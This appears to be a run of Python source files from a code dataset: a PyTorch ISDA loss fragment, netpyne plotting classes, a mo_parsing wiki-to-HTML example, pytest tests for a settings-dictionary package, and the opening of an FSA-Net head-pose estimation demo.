NxW_kj = torch.gather(NxW_ij,
1,
labels.view(N, 1, 1)
.expand(N, C, A))
CV_temp = cv_matrix[labels]
# sigma2 = ratio * \
# torch.bmm(torch.bmm(NxW_ij - NxW_kj,
# CV_temp).view(N * C, 1, A),
# (NxW_ij - NxW_kj).view(N * C, A, 1)).view(N, C)
sigma2 = ratio * \
torch.bmm(torch.bmm(NxW_ij - NxW_kj,
CV_temp),
(NxW_ij - NxW_kj).permute(0, 2, 1))
sigma2 = sigma2.mul(torch.eye(C)#.cuda()
.expand(N, C, C)).sum(2).view(N, C)
aug_result = y + 0.5 * sigma2
return aug_result
def forward(self, model, fc, x, target_x, ratio):
features = model(x)
y = fc(features)
self.estimator.update_CV(features.detach(), target_x)
isda_aug_y = self.isda_aug(fc, features, y, target_x, self.estimator.CoVariance.detach(), ratio)
loss = self.cross_entropy(isda_aug_y, target_x)
return loss, y
| 2.390625 | 2 |
netpyne/plotting/plotter.py | sanjayankur31/netpyne | 0 | 5006 | """
Module for plotting analyses
"""
import matplotlib as mpl
import matplotlib.pyplot as plt
import numpy as np
from copy import deepcopy
import pickle, json
import os
from matplotlib.offsetbox import AnchoredOffsetbox
try:
basestring
except NameError:
basestring = str
colorList = [[0.42, 0.67, 0.84], [0.90, 0.76, 0.00], [0.42, 0.83, 0.59], [0.90, 0.32, 0.00], [0.34, 0.67, 0.67], [0.90, 0.59, 0.00], [0.42, 0.82, 0.83], [1.00, 0.85, 0.00], [0.33, 0.67, 0.47], [1.00, 0.38, 0.60], [0.57, 0.67, 0.33], [0.50, 0.20, 0.00], [0.71, 0.82, 0.41], [0.00, 0.20, 0.50], [0.70, 0.32, 0.10]] * 3
class MetaFigure:
"""A class which defines a figure object"""
def __init__(self, kind, sim=None, subplots=None, rcParams=None, autosize=0.35, **kwargs):
if not sim:
from .. import sim
self.sim = sim
self.kind = kind
# Make a copy of the current matplotlib rcParams and update them
self.orig_rcParams = deepcopy(mpl.rcParamsDefault)
if rcParams:
for rcParam in rcParams:
if rcParam in mpl.rcParams:
mpl.rcParams[rcParam] = rcParams[rcParam]
else:
print(rcParam, 'not found in matplotlib.rcParams')
self.rcParams = rcParams
else:
self.rcParams = self.orig_rcParams
# Set up any subplots
if not subplots:
nrows = 1
ncols = 1
elif type(subplots) == int:
nrows = subplots
ncols = 1
elif type(subplots) == list:
nrows = subplots[0]
ncols = subplots[1]
# Create figure
if 'figSize' in kwargs:
figSize = kwargs['figSize']
else:
figSize = self.rcParams['figure.figsize']
if 'dpi' in kwargs:
dpi = kwargs['dpi']
else:
dpi = self.rcParams['figure.dpi']
if autosize:
maxplots = np.max([nrows, ncols])
figSize0 = figSize[0] + (maxplots-1)*(figSize[0]*autosize)
figSize1 = figSize[1] + (maxplots-1)*(figSize[1]*autosize)
figSize = [figSize0, figSize1]
self.fig, self.ax = plt.subplots(nrows, ncols, figsize=figSize, dpi=dpi)
self.plotters = []
def saveFig(self, sim=None, fileName=None, fileDesc=None, fileType='png', fileDir=None, overwrite=True, **kwargs):
"""
'eps': 'Encapsulated Postscript',
'jpg': 'Joint Photographic Experts Group',
'jpeg': 'Joint Photographic Experts Group',
'pdf': 'Portable Document Format',
'pgf': 'PGF code for LaTeX',
'png': 'Portable Network Graphics',
'ps': 'Postscript',
'raw': 'Raw RGBA bitmap',
'rgba': 'Raw RGBA bitmap',
'svg': 'Scalable Vector Graphics',
'svgz': 'Scalable Vector Graphics',
'tif': 'Tagged Image File Format',
'tiff': 'Tagged Image File Format'
"""
if not sim:
from .. import sim
if fileDesc is not None:
fileDesc = '_' + str(fileDesc)
else:
fileDesc = '_' + self.kind
if fileType not in self.fig.canvas.get_supported_filetypes():
raise Exception('fileType not recognized in saveFig')
else:
fileExt = '.' + fileType
if not fileName or not isinstance(fileName, basestring):
fileName = self.sim.cfg.filename + fileDesc + fileExt
else:
if fileName.endswith(fileExt):
fileName = fileName.split(fileExt)[0] + fileDesc + fileExt
else:
fileName = fileName + fileDesc + fileExt
if fileDir is not None:
fileName = os.path.join(fileDir, fileName)
if not overwrite:
while os.path.isfile(fileName):
try:
fileNumStr = fileName.split(fileExt)[0].split('_')[-1]
fileNumStrNew = str(int(fileNumStr) + 1).zfill(2)
fileName = fileName.split('_' + fileNumStr)[0]
except:
fileNumStr = fileNumStrNew = '01'
fileName = fileName.split(fileExt)[0]
fileName = fileName.split(fileNumStr)[0] + '_' + fileNumStrNew + fileExt
self.fig.savefig(fileName)
self.fileName = fileName
return fileName
def showFig(self, **kwargs):
try:
self.fig.show(block=False)
except:
self.fig.show()
def addSuptitle(self, **kwargs):
self.fig.suptitle(**kwargs)
def finishFig(self, **kwargs):
if 'suptitle' in kwargs:
if kwargs['suptitle']:
self.addSuptitle(**kwargs['suptitle'])
if 'tightLayout' not in kwargs:
plt.tight_layout()
elif kwargs['tightLayout']:
plt.tight_layout()
if 'saveFig' in kwargs:
if kwargs['saveFig']:
self.saveFig(**kwargs)
if 'showFig' in kwargs:
if kwargs['showFig']:
self.showFig(**kwargs)
else:
plt.close(self.fig)
# Reset the matplotlib rcParams to their original settings
mpl.style.use(self.orig_rcParams)
class GeneralPlotter:
"""A class used for plotting"""
def __init__(self, data, kind, axis=None, sim=None, rcParams=None, metafig=None, **kwargs):
"""
Parameters
----------
data : dict, str
axis : matplotlib axis
The axis to plot into. If axis is set to None, a new figure and axis are created and plotted into. If plotting into an existing axis, more options are available: xtwin, ytwin,
"""
self.kind = kind
# Load data
if type(data) == str:
if os.path.isfile(data):
self.data = self.loadData(data)
else:
raise Exception('In Plotter, if data is a string, it must be the path to a data file.')
else:
self.data = data
if not sim:
from .. import sim
self.sim = sim
self.axis = axis
if metafig:
self.metafig = metafig
# If an axis is input, plot there; otherwise make a new figure and axis
if self.axis is None:
final = True
self.metafig = MetaFigure(kind=self.kind, **kwargs)
self.fig = self.metafig.fig
self.axis = self.metafig.ax
else:
self.fig = self.axis.figure
# Attach plotter to its MetaFigure
self.metafig.plotters.append(self)
def loadData(self, fileName, fileDir=None, sim=None):
from ..analysis import loadData
self.data = loadData(fileName=fileName, fileDir=fileDir, sim=None)
def saveData(self, fileName=None, fileDesc=None, fileType=None, fileDir=None, sim=None, **kwargs):
from ..analysis import saveData as saveFigData
saveFigData(self.data, fileName=fileName, fileDesc=fileDesc, fileType=fileType, fileDir=fileDir, sim=sim, **kwargs)
def formatAxis(self, **kwargs):
if 'title' in kwargs:
self.axis.set_title(kwargs['title'])
if 'xlabel' in kwargs:
self.axis.set_xlabel(kwargs['xlabel'])
if 'ylabel' in kwargs:
self.axis.set_ylabel(kwargs['ylabel'])
if 'xlim' in kwargs:
if kwargs['xlim'] is not None:
self.axis.set_xlim(kwargs['xlim'])
if 'ylim' in kwargs:
if kwargs['ylim'] is not None:
self.axis.set_ylim(kwargs['ylim'])
if 'invert_yaxis' in kwargs:
if kwargs['invert_yaxis'] is True:
self.axis.invert_yaxis()
def addLegend(self, handles=None, labels=None, **kwargs):
legendParams = ['loc', 'bbox_to_anchor', 'fontsize', 'numpoints', 'scatterpoints', 'scatteryoffsets', 'markerscale', 'markerfirst', 'frameon', 'fancybox', 'shadow', 'framealpha', 'facecolor', 'edgecolor', 'mode', 'bbox_transform', 'title', 'title_fontsize', 'borderpad', 'labelspacing', 'handlelength', 'handletextpad', 'borderaxespad', 'columnspacing', 'handler_map']
# Check for and apply any legend parameters in the kwargs
legendKwargs = {}
for kwarg in kwargs:
if kwarg in legendParams:
legendKwargs[kwarg] = kwargs[kwarg]
# If 'legendKwargs' is found in kwargs, use those values instead of the defaults
if 'legendKwargs' in kwargs:
legendKwargs_new = kwargs['legendKwargs']
for key in legendKwargs_new:
if key in legendParams:
legendKwargs[key] = legendKwargs_new[key]
cur_handles, cur_labels = self.axis.get_legend_handles_labels()
if not handles:
handles = cur_handles
if not labels:
labels = cur_labels
self.axis.legend(handles, labels, **legendKwargs)
def addScalebar(self, matchx=True, matchy=True, hidex=True, hidey=True, unitsx=None, unitsy=None, scalex=1.0, scaley=1.0, xmax=None, ymax=None, space=None, **kwargs):
add_scalebar(self.axis, matchx=matchx, matchy=matchy, hidex=hidex, hidey=hidey, unitsx=unitsx, unitsy=unitsy, scalex=scalex, scaley=scaley, xmax=xmax, ymax=ymax, space=space, **kwargs)
def addColorbar(self, **kwargs):
plt.colorbar(mappable=self.axis.get_images()[0], ax=self.axis, **kwargs)
def finishAxis(self, **kwargs):
self.formatAxis(**kwargs)
if 'saveData' in kwargs:
if kwargs['saveData']:
self.saveData(**kwargs)
if 'dpi' in kwargs:
if kwargs['dpi']:
self.fig.set_dpi(kwargs['dpi'])
if 'figSize' in kwargs:
if kwargs['figSize']:
self.fig.set_size_inches(kwargs['figSize'])
if 'legend' in kwargs:
if kwargs['legend'] is True:
self.addLegend(**kwargs)
elif type(kwargs['legend']) == dict:
self.addLegend(**kwargs['legend'])
if 'scalebar' in kwargs:
if kwargs['scalebar'] is True:
self.addScalebar()
elif type(kwargs['scalebar']) == dict:
self.addScalebar(**kwargs['scalebar'])
if 'colorbar' in kwargs:
if kwargs['colorbar'] is True:
self.addColorbar()
elif type(kwargs['colorbar']) == dict:
self.addColorbar(**kwargs['colorbar'])
if 'grid' in kwargs:
self.axis.minorticks_on()
if kwargs['grid'] is True:
self.axis.grid()
elif type(kwargs['grid']) == dict:
self.axis.grid(**kwargs['grid'])
# If this is the only axis on the figure, finish the figure
if type(self.metafig.ax) != list:
self.metafig.finishFig(**kwargs)
# Reset the matplotlib rcParams to their original settings
mpl.style.use(self.metafig.orig_rcParams)
class ScatterPlotter(GeneralPlotter):
"""A class used for scatter plotting"""
def __init__(self, data, axis=None, **kwargs):
super().__init__(data=data, axis=axis, **kwargs)
self.kind = 'scatter'
self.x = data.get('x')
self.y = data.get('y')
self.s = data.get('s')
self.c = data.get('c')
self.marker = data.get('marker')
self.linewidth = data.get('linewidth')
self.cmap = data.get('cmap')
self.norm = data.get('norm')
self.alpha = data.get('alpha')
self.linewidths = data.get('linewidths')
def plot(self, **kwargs):
scatterPlot = self.axis.scatter(x=self.x, y=self.y, s=self.s, c=self.c, marker=self.marker, linewidth=self.linewidth, cmap=self.cmap, norm=self.norm, alpha=self.alpha, linewidths=self.linewidths)
self.finishAxis(**kwargs)
return self.fig
class LinePlotter(GeneralPlotter):
"""A class used for plotting one line per subplot"""
def __init__(self, data, axis=None, options={}, **kwargs):
super().__init__(data=data, axis=axis, **kwargs)
self.kind = 'line'
self.x = np.array(data.get('x'))
self.y = np.array(data.get('y'))
self.color = data.get('color')
self.marker = data.get('marker')
self.markersize = data.get('markersize')
self.linewidth = data.get('linewidth')
self.alpha = data.get('alpha')
def plot(self, **kwargs):
linePlot = self.axis.plot(self.x, self.y, color=self.color, marker=self.marker, markersize=self.markersize, linewidth=self.linewidth, alpha=self.alpha)
self.finishAxis(**kwargs)
return self.fig
class LinesPlotter(GeneralPlotter):
"""A class used for plotting multiple lines on the same axis"""
def __init__(self, data, axis=None, options={}, **kwargs):
super().__init__(data=data, axis=axis, **kwargs)
self.kind = 'lines'
self.x = np.array(data.get('x'))
self.y = np.array(data.get('y'))
self.color = data.get('color')
self.marker = data.get('marker')
self.markersize = data.get('markersize')
self.linewidth = data.get('linewidth')
self.alpha = data.get('alpha')
self.label = data.get('label')
def plot(self, **kwargs):
numLines = len(self.y)
if type(self.color) != list:
colors = [self.color for line in range(numLines)]
else:
colors = self.color
if type(self.marker) != list:
markers = [self.marker for line in range(numLines)]
else:
markers = self.marker
if type(self.markersize) != list:
markersizes = [self.markersize for line in range(numLines)]
else:
markersizes = self.markersize
if type(self.linewidth) != list:
linewidths = [self.linewidth for line in range(numLines)]
else:
linewidths = self.linewidth
if type(self.alpha) != list:
alphas = [self.alpha for line in range(numLines)]
else:
alphas = self.alpha
if self.label is None:
labels = [None for line in range(numLines)]
else:
labels = self.label
for index, line in enumerate(self.y):
self.axis.plot(
self.x,
self.y[index],
color=colors[index],
marker=markers[index],
markersize=markersizes[index],
linewidth=linewidths[index],
alpha=alphas[index],
label=labels[index],
)
self.finishAxis(**kwargs)
return self.fig
class HistPlotter(GeneralPlotter):
"""A class used for histogram plotting"""
def __init__(self, data, axis=None, options={}, **kwargs):
super().__init__(data=data, axis=axis, **kwargs)
self.kind = 'histogram'
self.x = data.get('x')
self.bins = data.get('bins', None)
self.range = data.get('range', None)
self.density = data.get('density', False)
self.weights = data.get('weights', None)
self.cumulative = data.get('cumulative', False)
self.bottom = data.get('bottom', None)
self.histtype = data.get('histtype', 'bar')
self.align = data.get('align', 'mid')
self.orientation = data.get('orientation', 'vertical')
self.rwidth = data.get('rwidth', None)
self.log = data.get('log', False)
self.color = data.get('color', None)
self.alpha = data.get('alpha', None)
self.label = data.get('label', None)
self.stacked = data.get('stacked', False)
self.data = data.get('data', None)
def plot(self, **kwargs):
histPlot = self.axis.hist(self.x, bins=self.bins, range=self.range, density=self.density, weights=self.weights, cumulative=self.cumulative, bottom=self.bottom, histtype=self.histtype, align=self.align, orientation=self.orientation, rwidth=self.rwidth, log=self.log, color=self.color, alpha=self.alpha, label=self.label, stacked=self.stacked, data=self.data)
self.finishAxis(**kwargs)
return self.fig
class ImagePlotter(GeneralPlotter):
"""A class used for image plotting using plt.imshow"""
def __init__(self, data, axis=None, options={}, **kwargs):
super().__init__(data=data, axis=axis, **kwargs)
self.kind = 'image'
self.X = data.get('X')
self.cmap = data.get('cmap', None)
self.norm = data.get('norm', None)
self.aspect = data.get('aspect', None)
self.interpolation = data.get('interpolation', None)
self.alpha = data.get('alpha', None)
self.vmin = data.get('vmin', None)
self.vmax = data.get('vmax', None)
self.origin = data.get('origin', None)
self.extent = data.get('extent', None)
self.aspect = data.get('aspect', None)
self.interpolation = data.get('interpolation', None)
self.filternorm = data.get('filternorm', True)
self.filterrad = data.get('filterrad', 4.0)
self.resample = data.get('resample', None)
self.url = data.get('url', None)
self.data = data.get('data', None)
def plot(self, **kwargs):
imagePlot = self.axis.imshow(self.X, cmap=self.cmap, norm=self.norm, aspect=self.aspect, interpolation=self.interpolation, alpha=self.alpha, vmin=self.vmin, vmax=self.vmax, origin=self.origin, extent=self.extent, filternorm=self.filternorm, filterrad=self.filterrad, resample=self.resample, url=self.url, data=self.data)
self.finishAxis(**kwargs)
return self.fig
class AnchoredScaleBar(AnchoredOffsetbox):
"""
A class used for adding scale bars to plots
"""
def __init__(self, axis, sizex=0, sizey=0, labelx=None, labely=None, loc=4, pad=0.1, borderpad=0.1, sep=2, prop=None, barcolor="black", barwidth=None, **kwargs):
"""
Draw a horizontal and/or vertical bar with the size in data coordinate
of the give axes. A label will be drawn underneath (center-aligned).
- transform : the coordinate frame (typically axes.transData)
- sizex,sizey : width of x,y bar, in data units. 0 to omit
- labelx,labely : labels for x,y bars; None to omit
- loc : position in containing axes
- pad, borderpad : padding, in fraction of the legend font size (or prop)
- sep : separation between labels and bars in points.
- **kwargs : additional arguments passed to base class constructor
"""
from matplotlib.patches import Rectangle
from matplotlib.offsetbox import AuxTransformBox, VPacker, HPacker, TextArea, DrawingArea
bars = AuxTransformBox(axis.transData)
if sizex:
if axis.xaxis_inverted():
sizex = -sizex
bars.add_artist(Rectangle((0,0), sizex, 0, ec=barcolor, lw=barwidth, fc="none"))
if sizey:
if axis.yaxis_inverted():
sizey = -sizey
bars.add_artist(Rectangle((0,0), 0, sizey, ec=barcolor, lw=barwidth, fc="none"))
if sizex and labelx:
self.xlabel = TextArea(labelx)
bars = VPacker(children=[bars, self.xlabel], align="center", pad=0, sep=sep)
if sizey and labely:
self.ylabel = TextArea(labely)
bars = HPacker(children=[self.ylabel, bars], align="center", pad=0, sep=sep)
AnchoredOffsetbox.__init__(self, loc, pad=pad, borderpad=borderpad, child=bars, prop=prop, frameon=False, **kwargs)
def add_scalebar(axis, matchx=True, matchy=True, hidex=True, hidey=True, unitsx=None, unitsy=None, scalex=1.0, scaley=1.0, xmax=None, ymax=None, space=None, **kwargs):
"""
Add scalebars to axes
Adds a set of scale bars to *ax*, matching the size to the ticks of the plot and optionally hiding the x and y axes
- axis : the axis to attach ticks to
- matchx,matchy : if True, set size of scale bars to spacing between ticks, if False, set size using sizex and sizey params
- hidex,hidey : if True, hide x-axis and y-axis of parent
- **kwargs : additional arguments passed to AnchoredScaleBars
Returns created scalebar object
"""
def get_tick_size(subaxis):
tick_size = None
tick_locs = subaxis.get_majorticklocs()
if len(tick_locs)>1:
tick_size = np.abs(tick_locs[1] - tick_locs[0])
return tick_size
if matchx:
sizex = get_tick_size(axis.xaxis)
if matchy:
sizey = get_tick_size(axis.yaxis)
if 'sizex' in kwargs:
sizex = kwargs['sizex']
if 'sizey' in kwargs:
sizey = kwargs['sizey']
def autosize(value, maxvalue, scale, n=1, m=10):
round_to_n = lambda value, n, m: int(np.ceil(round(value, -int(np.floor(np.log10(abs(value)))) + (n - 1)) / m)) * m
while value > maxvalue:
try:
value = round_to_n(0.8 * maxvalue * scale, n, m) / scale
except:
value /= 10.0
m /= 10.0
return value
if ymax is not None and sizey>ymax:
sizey = autosize(sizey, ymax, scaley)
if xmax is not None and sizex>xmax:
sizex = autosize(sizex, xmax, scalex)
kwargs['sizex'] = sizex
kwargs['sizey'] = sizey
if unitsx is None:
unitsx = ''
if unitsy is None:
unitsy = ''
if 'labelx' not in kwargs or kwargs['labelx'] is None:
kwargs['labelx'] = '%.3g %s'%(kwargs['sizex'] * scalex, unitsx)
if 'labely' not in kwargs or kwargs['labely'] is None:
kwargs['labely'] = '%.3g %s'%(kwargs['sizey'] * scaley, unitsy)
# add space for scalebar
if space is not None:
ylim0, ylim1 = axis.get_ylim()
ylim = (ylim0 - space, ylim1)
if ylim0 > ylim1: # if y axis is inverted
ylim = (ylim0 + space, ylim1)
axis.set_ylim(ylim)
scalebar = AnchoredScaleBar(axis, **kwargs)
axis.add_artist(scalebar)
if hidex:
axis.xaxis.set_visible(False)
if hidey:
axis.yaxis.set_visible(False)
if hidex and hidey:
axis.set_frame_on(False)
return scalebar
| 2.203125 | 2 |
examples/simpleWiki.py | klahnakoski/mo-parsing | 1 | 5007 | from mo_parsing.helpers import QuotedString
wikiInput = """
Here is a simple Wiki input:
*This is in italics.*
**This is in bold!**
***This is in bold italics!***
Here's a URL to {{Pyparsing's Wiki Page->https://site-closed.wikispaces.com}}
"""
def convertToHTML(opening, closing):
def conversionParseAction(t, l, s):
return opening + t[0] + closing
return conversionParseAction
italicized = QuotedString("*").add_parse_action(convertToHTML("<I>", "</I>"))
bolded = QuotedString("**").add_parse_action(convertToHTML("<B>", "</B>"))
boldItalicized = QuotedString("***").add_parse_action(convertToHTML("<B><I>", "</I></B>"))
def convertToHTML_A(t, l, s):
try:
text, url = t[0].split("->")
except ValueError:
raise ParseFatalException(s, l, "invalid URL link reference: " + t[0])
return '<A href="{}">{}</A>'.format(url, text)
urlRef = QuotedString("{{", end_quote_char="}}").add_parse_action(convertToHTML_A)
wikiMarkup = urlRef | boldItalicized | bolded | italicized
| 3.125 | 3 |
tests/test_app_settings_dict.py | wheelercj/app_settings | 0 | 5008 | <filename>tests/test_app_settings_dict.py<gh_stars>0
import pytest
import re
from typing import Any, Tuple
from dataclasses import dataclass
from app_settings_dict import Settings
def test_simple_settings() -> None:
settings = Settings(
settings_file_path="C:/Users/chris/Documents/sample_settings_file_name.json",
default_factories={
"key1": lambda: "value1",
},
data={
"key1": "hello",
"key2": "world",
},
)
assert settings["key1"] == "hello"
assert settings["key2"] == "world"
del settings["key1"]
del settings["key2"]
assert "key1" not in settings
assert "key2" not in settings
assert settings["key1"] == "value1"
with pytest.raises(KeyError):
settings["key2"]
def test_default_settings() -> None:
settings = Settings(
settings_file_path="sample settings file name.json",
default_factories={
"key1": lambda: "value1",
"key2": lambda: "value2",
"key3": lambda: "value3",
},
default_settings={
"key3": [],
},
data={
"key1": "hello",
"key2": "world",
},
)
assert settings["key1"] == "hello"
assert settings["key2"] == "world"
assert settings["key3"] == "value3"
del settings["key3"]
assert settings["key3"] == "value3"
settings.reset("key3")
assert settings["key3"] == []
settings["key3"] = "something"
assert settings["key3"] == "something"
settings.reset_all()
assert settings["key1"] == "hello"
assert settings["key2"] == "world"
assert settings["key3"] == []
def test_load_without_file() -> None:
def sample_prompt_function(settings: Settings) -> Settings:
# s = input("Enter the settings: ")
return settings.update({"key1": "a", "key2": "b"})
settings = Settings(
settings_file_path="not a real file.yaml",
prompt_user_for_all_settings=sample_prompt_function,
default_factories={
"key1": lambda: "value1",
"key2": lambda: "value2",
"key3": lambda: "value3",
},
default_settings={
"key3": [],
"key4": "value4",
},
data={
"key1": "hello",
"key2": "world",
},
)
assert settings["key1"] == "hello"
assert settings["key2"] == "world"
assert settings["key3"] == "value3"
settings.load(fallback_option="prompt user")
assert settings["key1"] == "a"
assert settings["key2"] == "b"
assert settings["key3"] == "value3"
with pytest.raises(KeyError):
settings["key4"]
settings.load(fallback_option="default settings")
assert settings["key1"] == "a"
assert settings["key2"] == "b"
assert settings["key3"] == "value3"
assert settings["key4"] == "value4"
settings.clear()
settings.load(fallback_option="default settings")
assert settings["key1"] == "hello"
assert settings["key2"] == "world"
assert settings["key3"] == []
assert settings["key4"] == "value4"
with pytest.raises(ValueError):
settings.load(fallback_option="invalid option")
def test_load_after_empty() -> None:
settings = Settings(
settings_file_path="sample settings file name.json",
prompt_user_for_all_settings=lambda: 1 / 0,
default_factories={
"key1": lambda: "value1",
},
default_settings={
"key1": [],
},
data={
"key1": "hello",
},
)
assert settings["key1"] == "hello"
settings.clear()
assert settings["key1"] == "value1"
def test_prompt() -> None:
def sample_prompt_function() -> Any:
# s = input("Enter a setting: ")
return "a"
settings = Settings(
settings_file_path="sample settings file name.json",
prompt_user_for_all_settings=lambda: {"key1": "a", "key2": "b"},
default_factories={
"key1": sample_prompt_function,
"key2": lambda: "value2",
"key3": lambda: "value3",
},
default_settings={
"key3": [],
},
data={
"key1": "hello",
"key2": "world",
},
)
assert settings["key1"] == "hello"
settings.prompt("key1")
assert settings["key1"] == "a"
def test_changing_settings_before_load() -> None:
settings = Settings(
settings_file_path="sample settings file name.json",
default_factories={
"key1": lambda: "value1",
},
default_settings={
"key1": [],
},
data={
"key1": "hello",
},
)
assert settings["key1"] == "hello"
settings.load(fallback_option="default settings")
assert settings["key1"] == "hello"
settings["key1"] = "a"
settings.load(fallback_option="default settings")
assert settings["key1"] == "a"
def test_update() -> None:
settings = Settings(
settings_file_path="sample settings file name.json",
default_factories={
"key1": lambda: "value1",
},
default_settings={
"key1": [],
},
data={
"key1": "hello",
},
)
assert settings["key1"] == "hello"
settings.update({"key1": "a"})
assert settings["key1"] == "a"
settings.update({"key2": "b"})
assert settings["key2"] == "b"
def test_Settings__is_using_json() -> None:
settings = Settings(
settings_file_path="sample_settings_file_name.json",
default_factories={
"key1": lambda: "value1",
},
data={
"key1": "hello",
"key2": "world",
},
)
assert settings._Settings__is_using_json()
settings.settings_file_path = "sample_settings_file_name.yaml"
assert not settings._Settings__is_using_json()
def test_load_from_dict() -> None:
settings = Settings()
settings.load_from_dict(
{
"key1": "hello",
"key2": "world",
}
)
assert len(settings.data) == 0
settings = Settings(
data={
"key1": "a",
"key2": "b",
}
)
settings.load_from_dict(
{
"key1": "c",
"key2": "d",
}
)
assert settings.data["key1"] == "c"
assert settings.data["key2"] == "d"
def test_dump_to_dict() -> None:
settings = Settings(
settings_file_path="sample_settings_file_name.json",
data={
"key1": "hello",
"key2": "world",
},
)
assert settings.dump_to_dict() == {
"key1": "hello",
"key2": "world",
}
def test_nested_Settings() -> None:
settings = Settings(
settings_file_path="sample_settings_file_name.json",
default_settings={
"key6": [],
"key7": Settings(
data={
"key8": "value8",
}
),
},
data={
"key1": "hello",
"key2": "world",
"key3": "value3",
"key4": Settings(
settings_file_path="why would anyone want an inner file though.yaml",
data={
"key5": "value5",
},
),
},
)
assert settings.dump_to_dict() == {
"key1": "hello",
"key2": "world",
"key3": "value3",
"key4": {
"key5": "value5",
},
}
def test_creating_setting_after_init() -> None:
settings = Settings(
settings_file_path="sample_settings_file_name.json",
default_settings={
"key1": [],
"key2": "value2",
},
)
with pytest.raises(KeyError):
settings["key3"] = "value3"
def test_prompt_error() -> None:
settings = Settings(
settings_file_path="nonexistent file.json",
default_settings={
"key1": [],
"key2": "value2",
},
)
with pytest.raises(ValueError):
settings.load(fallback_option="prompt user")
def test_nested_setting_loaders_and_dumpers() -> None:
@dataclass
class Coords:
x: int
y: int
def __init__(self, x_and_y: Tuple[int, int]) -> None:
self.x = x_and_y[0]
self.y = x_and_y[1]
settings = Settings(
setting_loader=Coords,
setting_dumper=lambda obj: (obj.x, obj.y),
data={
"location 1": Coords(x_and_y=(1, 2)),
"location 2": Coords(x_and_y=(3, 4)),
"patterns": Settings(
setting_loader=re.compile,
setting_dumper=lambda x: x.pattern,
data={
"phone number pattern": re.compile(r"\d{3}-?\d{3}-?\d{4}"),
"email address pattern": re.compile(
r"[\w\d.+-]+@[\w\d.-]+\.[\w\d]+"
),
},
),
},
)
settings_dict = settings.dump_to_dict()
assert settings_dict["location 1"] == (1, 2)
assert settings_dict["location 2"] == (3, 4)
assert settings_dict["patterns"]["phone number pattern"] == r"\d{3}-?\d{3}-?\d{4}"
assert (
settings_dict["patterns"]["email address pattern"]
== r"[\w\d.+-]+@[\w\d.-]+\.[\w\d]+"
)
settings.load_from_dict(settings_dict)
assert settings["location 1"] == Coords(x_and_y=(1, 2))
assert settings["location 2"] == Coords(x_and_y=(3, 4))
assert settings["patterns"]["phone number pattern"] == re.compile(
r"\d{3}-?\d{3}-?\d{4}"
)
assert settings["patterns"]["email address pattern"] == re.compile(
r"[\w\d.+-]+@[\w\d.-]+\.[\w\d]+"
)
def test_init_without_keywords() -> None:
with pytest.raises(TypeError):
Settings("sample settings file path.json")
| 2.40625 | 2 |
demo/demo_FSANET_ssd.py | jacke121/FSA-Net | 0 | 5009 | import os
import time
import cv2
import sys
sys.path.append('..')
import numpy as np
from math import cos, sin
from lib.FSANET_model import *
import numpy as np
from keras.layers import Average
def draw_axis(img, yaw, pitch, roll, tdx=None, tdy=None, size = 50):
print(yaw,roll,pitch)
pitch = pitch * np.pi / 180
yaw = -(yaw * np.pi / 180)
roll = roll * np.pi / 180
if tdx != None and tdy != None:
tdx = tdx
tdy = tdy
else:
height, width = img.shape[:2]
tdx = width / 2
tdy = height / 2
# X-Axis pointing to right. drawn in red
x1 = size * (cos(yaw) * cos(roll)) + tdx
y1 = size * (cos(pitch) * sin(roll) + cos(roll) * sin(pitch) * sin(yaw)) + tdy
# Y-Axis | drawn in green
# v
x2 = size * (-cos(yaw) * sin(roll)) + tdx
y2 = size * (cos(pitch) * cos(roll) - sin(pitch) * sin(yaw) * sin(roll)) + tdy
# Z-Axis (out of the screen) drawn in blue
x3 = size * (sin(yaw)) + tdx
y3 = size * (-cos(yaw) * sin(pitch)) + tdy
cv2.line(img, (int(tdx), int(tdy)), (int(x1),int(y1)),(0,0,255),3)
cv2.line(img, (int(tdx), int(tdy)), (int(x2),int(y2)),(0,255,0),3)
cv2.line(img, (int(tdx), int(tdy)), (int(x3),int(y3)),(255,0,0),2)
return img
def draw_results_ssd(detected,input_img,faces,ad,img_size,img_w,img_h,model):
# loop over the detections
if detected.shape[2]>0:
for i in range(0, detected.shape[2]):
# extract the confidence (i.e., probability) associated with the
# prediction
confidence = detected[0, 0, i, 2]
# filter out weak detections
if confidence > 0.5:
# compute the (x, y)-coordinates of the bounding box for
# the face and extract the face ROI
(h0, w0) = input_img.shape[:2]
box = detected[0, 0, i, 3:7] * np.array([w0, h0, w0, h0])
(startX, startY, endX, endY) = box.astype("int")
# print((startX, startY, endX, endY))
x1 = startX
y1 = startY
w = endX - startX
h = endY - startY
x2 = x1+w
y2 = y1+h
xw1 = max(int(x1 - ad * w), 0)
yw1 = max(int(y1 - ad * h), 0)
xw2 = min(int(x2 + ad * w), img_w - 1)
yw2 = min(int(y2 + ad * h), img_h - 1)
cv2.rectangle(input_img, (xw1,yw1), (xw2,yw2), (0, 0, 255), 2)
start=time.time()
faces[i,:,:,:] = cv2.resize(input_img[yw1:yw2 + 1, xw1:xw2 + 1, :], (img_size, img_size))
faces[i,:,:,:] = cv2.normalize(faces[i,:,:,:], None, alpha=0, beta=255, norm_type=cv2.NORM_MINMAX)
face = np.expand_dims(faces[i,:,:,:], axis=0)
p_result = model.predict(face)
print('fangxiang',time.time()-start)
face = face.squeeze()
img = draw_axis(input_img[yw1:yw2 + 1, xw1:xw2 + 1, :], p_result[0][0], p_result[0][1], p_result[0][2])
input_img[yw1:yw2 + 1, xw1:xw2 + 1, :] = img
return input_img
def main():
os.makedirs('./img',exist_ok=True)
img_size = 64
img_idx = 0
ad = 0.6
#Parameters
num_capsule = 3
dim_capsule = 16
routings = 2
stage_num = [3,3,3]
lambda_d = 1
num_classes = 3
image_size = 64
num_primcaps = 7*3
m_dim = 5
S_set = [num_capsule, dim_capsule, routings, num_primcaps, m_dim]
model1 = FSA_net_Capsule(image_size, num_classes, stage_num, lambda_d, S_set)()
model2 = FSA_net_Var_Capsule(image_size, num_classes, stage_num, lambda_d, S_set)()
num_primcaps = 8*8*3
S_set = [num_capsule, dim_capsule, routings, num_primcaps, m_dim]
model3 = FSA_net_noS_Capsule(image_size, num_classes, stage_num, lambda_d, S_set)()
weight_file1 = '../pre-trained/300W_LP_models/fsanet_capsule_3_16_2_21_5/fsanet_capsule_3_16_2_21_5.h5'
model1.load_weights(weight_file1)
print('Finished loading model 1.')
weight_file2 = '../pre-trained/300W_LP_models/fsanet_var_capsule_3_16_2_21_5/fsanet_var_capsule_3_16_2_21_5.h5'
